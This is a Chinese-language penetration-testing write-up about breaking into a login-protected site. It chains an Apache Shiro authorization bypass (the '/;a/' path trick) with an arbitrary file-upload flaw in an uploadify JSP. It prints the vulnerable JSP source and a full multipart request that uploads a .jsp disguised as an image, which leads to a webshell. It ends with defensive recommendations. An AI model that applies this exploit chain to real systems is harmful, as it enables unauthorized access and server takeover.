Shiro权限绕过实战利用教学文档<\/h1>

0x01 Shiro反序列化命令执行初步检测<\/h2>

初始发现<\/strong>：<\/p>

使用BurpSuite插件检测到Shiro框架存在<\/li>
尝试使用ShiroExploit工具进行检测：

DNSLog方式检测失败<\/li>
静态文件回显方式检测失败<\/li>
Tomcat回显方式检测失败<\/li> <\/ul> <\/li> <\/ul> <\/li>

环境特征<\/strong>：<\/p>

目标站点为登录框界面<\/li>
验证码功能无效<\/li>
爆破尝试未成功<\/li> <\/ul> <\/li> <\/ol>
0x02 任意文件上传漏洞利用<\/h2>
漏洞发现<\/h3>

通过框架识别发现目标使用某admin框架<\/li>
搜索公开漏洞发现存在文件上传漏洞：

漏洞文件路径：plugins\/uploadify\/uploadFile.jsp<\/code><\/li>
该文件存在任意文件上传漏洞<\/li> <\/ul> <\/li> <\/ol> 漏洞文件分析<\/h3> <%@ page language="java" contentType="text\/html; charset=UTF-8" pageEncoding="UTF-8"%> <%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %> <%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %> <%! public void upload(HttpServletRequest request, HttpServletResponse response)throws ServletException, IOException { String savePath = this.getServletConfig().getServletContext().getRealPath(""); savePath = savePath + request.getParameter("uploadPath"); File f1 = new File(savePath); if (!f1.exists()) { f1.mkdirs(); } DiskFileItemFactory fac = new DiskFileItemFactory(); ServletFileUpload upload = new ServletFileUpload(fac); upload.setHeaderEncoding("utf-8"); List fileList = null; try { fileList = upload.parseRequest(request); } catch (FileUploadException ex) { return; } String fileNmae = request.getParameter("fileNmae"); Iterator<FileItem> it = fileList.iterator(); String name = ""; String extName = ""; while (it.hasNext()) { FileItem item = it.next(); if (!item.isFormField()) { name = item.getName(); long size = item.getSize(); String type = item.getContentType(); if (name == null || name.trim().equals("")) { continue; } if (name.lastIndexOf(".") >= 0) { extName = name.substring(name.lastIndexOf(".")); } File file = null; if(null != fileNmae && !"".equals(fileNmae)){ file = new File(savePath + fileNmae); }else{ do { if(null != fileNmae && !"".equals(fileNmae)){ file = new File(savePath + fileNmae); }else{ name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date()); name = name + (int)(Math.random()*90000+10000); file = new File(savePath + name + extName); } } while (file.exists()); } File saveFile = new File(savePath + name + extName); try { item.write(saveFile); } catch (Exception e) { e.printStackTrace(); } } } response.getWriter().print((name.trim() + extName.trim()).trim()); } %> <% upload(request, response); %> <\/code><\/pre> Shiro权限绕过技术<\/h3> 直接访问限制<\/strong>：<\/p> 直接访问plugins\/uploadify\/uploadFile.jsp<\/code>会302跳转（未登录）<\/li> <\/ul> <\/li> 绕过方法<\/strong>：<\/p> 使用Shiro权限绕过技术：\/;a\/plugins\/uploadify\/uploadFile.jsp<\/code><\/li> 状态码变为200，绕过成功<\/li> <\/ul> <\/li> <\/ol> 文件上传利用<\/h3> 初始尝试失败<\/strong>：<\/p> 上传成功但找不到文件<\/li> 原因：request.getParameter("uploadPath")<\/code>无法解析multipart里的参数<\/li> <\/ul> <\/li> 正确利用方式<\/strong>：<\/p> 构造上传请求：<\/li> <\/ul> POST<\/span> \/;a\/plugins\/uploadify\/uploadFile.jsp?uploadPath=\/plugins\/uploadify\/ HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Content-Type:<\/span> multipart\/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ<\/span> <\/span><\/span> <\/span><\/span>------WebKitFormBoundaryQDeBiVqfe6p3FMnJ <\/span><\/span>Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp" <\/span><\/span>Content-Type: image\/jpeg <\/span><\/span> <\/span><\/span>test <\/span><\/span>------WebKitFormBoundaryQDeBiVqfe6p3FMnJ-- <\/span><\/span><\/code><\/pre> 成功上传WebShell<\/li> <\/ul> <\/li> <\/ol> 0x03 相关工具与资源<\/h2> 检测工具<\/strong>：<\/p> BurpSuite插件：HaE (https:\/\/github.com\/gh0stkey\/HaE)<\/li> MarkInfo插件 (https:\/\/github.com\/gh0stkey\/BurpSuite-Extender-MarkInfo)<\/li> <\/ul> <\/li> 参考文章<\/strong>：<\/p> Shiro权限绕过技术分析：https:\/\/mp.weixin.qq.com\/s\/yb6Tb7zSTKKmBlcNVz0MBA<\/li> <\/ul> <\/li> <\/ol> 0x04 防御建议<\/h2> Shiro配置<\/strong>：<\/p> 更新至最新版本<\/li> 检查并修复权限绕过漏洞<\/li> 实现严格的URL访问控制<\/li> <\/ul> <\/li> 文件上传防护<\/strong>：<\/p> 删除不必要的上传组件<\/li> 实现文件类型白名单验证<\/li> 限制上传目录的执行权限<\/li> 对上传文件进行重命名<\/li> <\/ul> <\/li> 框架安全<\/strong>：<\/p> 及时更新框架版本<\/li> 关注安全公告和漏洞信息<\/li> 禁用不必要的功能和组件<\/li> <\/ul> <\/li> <\/ol> 总结<\/h2> 本案例展示了如何结合Shiro权限绕过和文件上传漏洞实现系统入侵。关键在于：<\/p> 识别Shiro框架并绕过其权限控制<\/li> 利用已知框架漏洞定位可利用的文件上传组件<\/li> 正确构造上传请求绕过防护机制<\/li> <\/ol> 这种组合攻击方式在实际渗透测试中较为常见，防御方需要从多个层面进行防护。<\/p>